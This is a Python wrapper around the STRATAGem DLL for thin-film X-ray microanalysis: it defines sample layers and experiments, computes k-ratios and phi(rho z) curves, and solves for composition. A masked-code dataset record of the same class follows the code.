if key is None:
key = self._key
logger.debug("StSdAddLayer(key)")
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug("StSdAddLayer(key, %i)", ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error("Cannot add layer")
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug("StSdAddElt(key, %i, %i)", ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error("Cannot add element")
z, wf = value
nra_ = c.c_int(z)
logger.debug("StSdSetNrAtom(key, %i, %i, %i)", ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error("Cannot set atomic number")
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug("StSdSetConc(key, %i, %i, %f)", ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error("Cannot set concentration")
logger.debug("StSdSetConcFlag(key, %i, %i, %i)", ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)):
self._raise_error("Cannot set concentration flag")
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1e3 # g/cm3
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 1e10 # Angstroms
mass_thickness = layer.mass_thickness_kg_m2 * 0.1 # g/cm2
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug("StSdSetThick(key, %i, %r, %d, %d, %d)", ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error("Cannot set thickness")
return int(ilayer_)
def _create_standard(self, standard):
"""
Internal method to create a new object defining the standard
:class:`.Sample`.
"""
# Create new object
key_ = self._stobjectnew(standard=True)
# Set sample
for layer in standard.layers:
self._add_layer(layer, substrate=False, key=key_)
self._add_layer(standard.substrate, substrate=True, key=key_)
# Save
filename = key_.value.decode('ascii') + '.tfs'
filepath = os.path.join(self.get_standard_directory(), filename)
filepath_ = c.create_string_buffer(filepath.encode('ascii'))
logger.debug('StObjectWriteFile(key, %s)', filepath)
if not self._lib.StObjectWriteFile(key_, filepath_):
self._raise_error("Cannot save standard")
# Delete object
self._lib.StObjectDelete(key_)
self._tmpstandards.append(filepath)
return filepath
@_check_key
def add_experiment(self, experiment):
"""
Adds an experiment, i.e. measurements of k-ratio at different energies.
.. hint:: Use :meth:`reset` method to remove defined experiments.
:arg experiment: experiment
:type experiment: :class:`Experiment`
"""
nra_ = c.c_int(experiment.z)
klm_ = c.c_int(experiment.line)
hv_ = c.c_double(experiment.energy_eV / 1e3)
ielt_ = c.c_int()
iline_ = c.c_int()
iexpk_ = c.c_int()
logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z, experiment.line)
if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_,
c.byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
self._raise_error("Cannot add atomic number and line")
standard = experiment.standard
if isinstance(standard, Sample):
standard = self._create_standard(standard)
standard_ = c.create_string_buffer(standard.encode('ascii'))
logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value, iline_.value, klm_.value, standard)
if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):
self._raise_error("Cannot set standard")
analyzed = experiment.is_analyzed()
analyzed_ = c.c_bool(analyzed)
logger.debug("StEdSetAnalyzedFlag(key, %i, %r)", ielt_.value, analyzed)
if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
self._raise_error("Cannot add experiment analyzed flag")
kratio_ = c.c_double(experiment.kratio)
logger.debug("StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)",
ielt_.value, iline_.value, iexpk_.value,
experiment.energy_eV / 1e3, experiment.energy_eV / 1e3,
experiment.kratio)
if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_,
hv_, hv_, kratio_, c.c_double(0.0),
c.c_int(2)):
self._raise_error("Cannot set experiment k-ratio")
if experiment.is_analyzed():
indexes = (ielt_.value, iline_.value, iexpk_.value)
self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
@_check_key
def set_geometry(self, toa, tilt, azimuth):
"""
Sets the geometry.
:arg toa: take off angle (in radians)
:arg tilt: tilt angle (in radians)
:arg azimuth: azimuthal angle (in radians)
"""
toa_ = c.c_double(toa)
tilt_ = c.c_double(tilt)
azimuth_ = c.c_double(azimuth)
logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)
if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):
self._raise_error("Cannot set geometry parameters")
@_check_key
def get_geometry(self):
"""
Returns the geometry.
:return: take off angle (in radians), tilt angle (in radians),
azimuthal angle (in radians)
"""
toa_ = c.c_double()
tilt_ = c.c_double()
azimuth_ = c.c_double()
logger.debug('StGetGeomParams(key)')
if not self._lib.StGetGeomParams(self._key, c.byref(toa_),
c.byref(tilt_), c.byref(azimuth_)):
self._raise_error("Cannot get geometry parameters")
return toa_.value, tilt_.value, azimuth_.value
geometry = property(get_geometry, doc='Property to get geometry')
@_check_key
def set_prz_mode(self, mode):
"""
Sets the type of model to use for the :math:`\\phi(\\rho z)`.
:arg mode: type of model, either
* :data:`PRZMODE_XPP`
* :data:`PRZMODE_PAP`
* :data:`PRZMODE_GAU`
:type mode: :class:`int`
"""
mode_ = c.c_int(mode)
logger.debug('StSetPrzMode(%i)', mode)
self._lib.StSetPrzMode(mode_)
@_check_key
def get_prz_mode(self):
"""
Returns the type of model to use for the :math:`\\phi(\\rho z)`.
:return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
:data:`PRZMODE_GAU`
:rtype: :class:`int`
"""
return self._lib.StGetPrzMode()
prz_mode = property(get_prz_mode, set_prz_mode,
doc='Property to get/set prz mode')
@_check_key
def set_fluorescence(self, flag):
"""
Sets the fluorescence flag.
:arg flag: either
* :data:`FLUORESCENCE_NONE`
* :data:`FLUORESCENCE_LINE`
* :data:`FLUORESCENCE_LINE_CONT`
:type flag: :class:`int`
"""
flag_ = c.c_int(flag)
logger.debug('StSetFluorFlg(%i)', flag)
self._lib.StSetFluorFlg(flag_)
@_check_key
def get_fluorescence(self):
"""
Returns the fluorescence flag.
:return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
or :data:`FLUORESCENCE_LINE_CONT`
:rtype: :class:`int`
"""
return self._lib.StGetFluorFlg()
fluorescence = property(get_fluorescence, set_fluorescence,
doc='Property to get/set fluorescence')
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
@_check_key
def get_standard_directory(self):
"""
Returns the directory where standard files are stored.
:rtype: :class:`str`
"""
dirpath = (c.c_char * 256)()
self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
return dirpath.value.decode('ascii')
standard_directory = property(get_standard_directory, set_standard_directory,
doc='Property to get/set standard directory')
@_check_key
def compute_kratio_vs_thickness(self, layer,
thickness_low_m, thickness_high_m, step):
"""
Computes the variation of the k-ratio as a function of the thickness
for a layer.
:arg layer: layer of a sample (must have been previously added)
:type layer: :class:`.Layer`
:arg thickness_low_m: lower limit of the thickness in meters
:type thickness_low_m: :class:`float`
:arg thickness_high_m: upper limit of the thickness in meters
:type thickness_high_m: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of thicknesses
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each thickness
"""
logger.debug('StSetKvsThicknessUnit(2)')
self._lib.StSetKvsThicknessUnit(2) # unit in nm
if layer not in self._layers:
raise ValueError("Unknown layer")
ilayer = self._layers[layer]
ilayer_ = c.c_int(ilayer)
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
# Compute
low_ = c.c_double(thickness_low_m * 1e9)
high_ = c.c_double(thickness_high_m * 1e9)
logger.debug('StComputeKvsThickness(key, %i, %f, %f)',
ilayer, thickness_low_m * 1e9, thickness_high_m * 1e9)
if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_):
self._raise_error("Cannot compute k-ratio vs thickness")
# Fetch results
thicknesses = []
kratios = {}
thick_ = c.c_double()
k_ = c.c_double()
for i in range(step + 1):
i_ = c.c_int(i)
if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
self._raise_error("Cannot get thickness")
thicknesses.append(thick_.value)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
iHv_ = c.c_int(indexes[2])
if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
iHv_, c.byref(k_)):
self._raise_error("Cannot get k-ratio")
kratios.setdefault(experiment, []).append(k_.value)
return thicknesses, kratios
@_check_key
def compute_kratio_vs_energy(self, energy_high_eV, step):
"""
Computes the variation of the k-ratio as a function of the incident
energy.
Note that the computation also starts at 0 keV up to the specified energy.
:arg energy_high_eV: upper limit of the thickness in electronvolts
:type energy_high_eV: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of energies in electronvolts
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each energy
"""
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
energy_ = c.c_double(energy_high_eV / 1e3)
logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1e3,))
self._lib.StSetMaxHV(energy_)
# Compute
logger.debug('StComputeKvsHV(key)')
if not self._lib.StComputeKvsHV(self._key):
self._raise_error("Cannot compute k-ratio vs energy")
# Fetch results
energies = []
kratios = {}
k_ = c.c_double()
bHV_ = c.c_bool(True)
increment = float(energy_high_eV / 1e3) / step
for i in range(step + 1):
hv = i * increment
hv_ = c.c_double(hv)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_, bHV_, c.byref(k_)):
self._raise_error("Cannot get k-ratio")
kratios.setdefault(experiment, []).append(k_.value)
energies.append(hv)
return energies, kratios
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
@_check_key
def _compute_kratios_multilayers(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_thickness`.
"""
for i, layer in enumerate(self._layers.keys()):
if not layer.is_thickness_known():
raise ValueError("Thickness of layer %i is unknown" % i)
# Compute
layer = list(self._layers.keys())[0]
thickness_low_m = layer.thickness_m
thickness_high_m = layer.thickness_m * 10
step = 1
_thicknesses, kratios = \
self.compute_kratio_vs_thickness(layer, thickness_low_m,
thickness_high_m, step)
# Reorganize results
output = {}
for experiment, kratio in kratios.items():
output.setdefault(experiment, kratio[0])
return output
@_check_key
def _compute_kratios_substrate(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_energy`.
"""
output = {}
step = 2
for experiment in self._experiments:
energy_high_eV = experiment.energy_eV
_energies, kratios = \
self.compute_kratio_vs_energy(energy_high_eV, step)
kratio = kratios[experiment][-1]
if (kratio < 0): # Bug in strategem that some energy don't work
logger.warn("STRATAGem returns a negative k-ratio, re-try with energy + 1 eV")
_energies, kratios = \
self.compute_kratio_vs_energy(energy_high_eV + 1.0, step)
kratio = kratios[experiment][-1]
output.setdefault(experiment, kratio)
return output
@_check_key
def compute(self, iteration_max=50):
"""
Computes the unknown composition(s) and thickness(es) in the specified
sample.
:arg iteration_max: maximum number of iterations of the solve
(default: 50)
:type iteration_max: :class:`int`
:return: calculated sample
:rtype: :class:`.Sample`
"""
# Add missing experiments
zs = set(exp.z for exp in self._experiments.keys())
for layer in list(self._layers.keys()) + [self._substrate[0]]:
for z, wf in layer.composition.items():
if z in zs:
continue
if wf is None:
continue
logger.debug('Added dummy experiment for z=%i', z)
exp = Experiment(z, LINE_KA, 0.0, analyzed=False) # dummy
self.add_experiment(exp)
# Set iteration maximum
iteration_max_ = c.c_int(iteration_max)
logger.debug('StSetMaxNbIter(%i)', iteration_max)
self._lib.StSetMaxNbIter(iteration_max_)
# Compute
logger.debug('StComputeIterpStart(key)')
if not self._lib.StComputeIterpStart(self._key):
self._raise_error("Cannot start iteration")
continue_ = c.c_bool(True)
iteration = 0
logger.debug('Start iteration')
while True:
iteration += 1
logger.debug('Iteration #%i' % iteration)
logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
break
if not continue_.value:
break
logger.debug('Iteration completed')
# Fetch results
thick_known = c.c_bool()
mass_thickness = c.c_double()
thickness = c.c_double()
density = c.c_double()
def get_layer(layer, ilayer):
ilayer_ = c.c_int(ilayer)
logger.debug('StSdGetNbElts(key, %i)' % ilayer)
nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
if nbelt == -1:
self._raise_error("Cannot get number of elements")
flag_ = (c.c_int * nbelt)()
wfs_ = (c.c_double * nbelt)()
logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
if not self._lib.StSdGetLayRawConcs(self._key, ilayer_,
flag_, wfs_):
self._raise_error("Cannot get layer concentration")
composition = {}
for z in layer.composition.keys():
nra_ = c.c_int(z)
logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
composition[z] = wfs_[zindex]
logger.debug("StSdGetThick(key, %i)", ilayer)
if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(thick_known),
c.byref(mass_thickness), c.byref(thickness),
c.byref(density)):
self._raise_error("Cannot get thickness")
return (composition, thickness.value / 1e10,
mass_thickness.value * 10.0, density.value * 1e3)
sample = Sample(get_layer(*self._substrate)[0])
for layer, ilayer in self._layers.items():
sample.add_layer(*get_layer(layer, ilayer))
return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
"""
Compute :math:`\\phi(\\rho z)` of all experiments.
.. warning:: Only available for substrate (no layers).
:arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
distribution in meters. If ``None``, Kanaya-Okayama electron range
is used with a safety factor of 1.5.
:type maxdepth_m: :class:`float`
:arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
:type bins: :class:`int`
:return: a :class:`dict` where the keys are the experiments and the
values are a tuple containing three lists:
* :math:`\\rho z` coordinates (in g/cm2)
* generated intensities of :math:`\\phi(\\rho z)` (no absorption)
* emitted intensites of :math:`\\phi(\\rho z)`
"""
if len(self._layers) > 0:
raise RuntimeError('PRZ can only be computed for substrate')
# Set scaling
hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
maxhv_eV = max(hvs_eV)
maxhv_ = c.c_double(maxhv_eV / 1e3)
logger.debug('StSetScaleHV(%s)', maxhv_eV / 1e3)
self._lib.StSetScaleHV(maxhv_)
# Compute
logger.debug('StComputePrz(key)')
if not self._lib.StComputePrz(self._key):
self._raise_error('Cannot compute prz')
# Get values
przs = {}
for experiment, indexes in self._experiments.items():
# Size of each bin
if maxdepth_m is None:
# Calculate max depth using Kanaya-Okayama
maxdepth_m = 0.0
energy_keV = experiment.energy_eV / 1e3
for z, fraction in self._substrate[0].composition.items():
dr = (0.0276 * atomic_mass_kg_mol(z) * 1e3 * energy_keV ** 1.67) / \
(z ** 0.89 * mass_density_kg_m3(z) / 1e3)
maxdepth_m += fraction / (dr * 1e-6)
maxdepth_m = 1.0 / maxdepth_m
maxdepth_m *= 1.5 # safety factor
increment_kg_m2 = (maxdepth_m * self._substrate[0].density_kg_m3) / bins
# Indexes
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
ihv_ = c.c_int(0)
rzs = []
ys_generated = []
ys_emitted = []
for i in range(bins):
rz_ = c.c_double(i * increment_kg_m2 * 0.1)
rzs.append(i * increment_kg_m2)
y_ = c.c_double()
bUseExp_ = c.c_bool(True)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_emitted.append(y_.value)
y_ = c.c_double()
bUseExp_ = c.c_bool(False)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_generated.append(y_.value)
przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
return przs
|
normal
|
{
"blob_id": "6914656a2f78fa1fe74a67bf09b017585b3eac88",
"index": 2770,
"step-1": "<mask token>\n\n\nclass Stratagem:\n <mask token>\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n <mask token>\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n <mask token>\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n <mask token>\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n <mask token>\n <mask token>\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n <mask token>\n <mask token>\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n <mask token>\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n <mask token>\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n <mask token>\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = 